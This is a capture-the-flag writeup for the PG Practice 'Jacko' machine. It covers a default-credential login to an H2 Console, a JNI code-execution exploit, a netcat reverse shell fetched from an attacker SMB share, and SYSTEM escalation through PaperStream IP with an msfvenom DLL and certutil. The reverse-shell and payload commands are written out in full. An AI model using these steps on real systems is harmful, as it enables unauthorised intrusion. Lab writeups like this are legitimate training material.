Jacko
PG Practice Jacko writeup
Nmap
On port 8082 there is a login page for the H2 Console. Connecting with the pre-filled default values logs us in to the console.
Once logged in we can see that we are running H2 Console version 1.4.199. A search on exploit-db shows a public exploit for 1.4.199 that gives Java code execution through JNI (it creates a JNIScriptEngine alias, which is the primitive the rest of this writeup uses).
The following snippet is the exploit code we need to run through the H2 Console:
The part of the exploit that executes commands on the target machine is shown below. To get code execution I set up an SMB server on my attacking machine with Impacket's smbserver.py and made sure nc.exe was in the shared directory.
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
First set up an SMB server, with nc.exe in the shared directory:
Then paste the code from exploit-db into the SQL statement box of the H2 Console and make sure the -- Evaluate script section calls nc.exe from the attacking machine's SMB share, pointing at the IP and port your netcat listener is waiting on.
When ready, run the SQL statement; we should see the target authenticate to smbserver.py.
Shortly after, we catch a reverse shell on our netcat listener.
Now that we have a shell, the first thing to do is fix PATH on the target machine, as shown below:
Looking through Program Files (x86) we can see a directory called PAPERSTREAM IP. Searching exploit-db for it takes us to the following:
The description for this exploit is shown below:
We need to change the name of the DLL generated by msfvenom and the payload location. When I first downloaded the exploit to C:\Windows\Temp, the file was deleted instantly, possibly by AV.
First I generated an msfvenom reverse shell with the DLL name the exploit expects, UninOldIS.dll:
msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
Then I changed the payload file variable in the exploit to point at the user's Desktop.
At this point, move into the user's Desktop and use certutil to download the files; when I copied them over SMB I could not get the payload to trigger.
Start a netcat listener on the attacking machine on port 8082, then run exploit.ps1 on the target with PowerShell:
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
A short while later we should receive a shell as SYSTEM.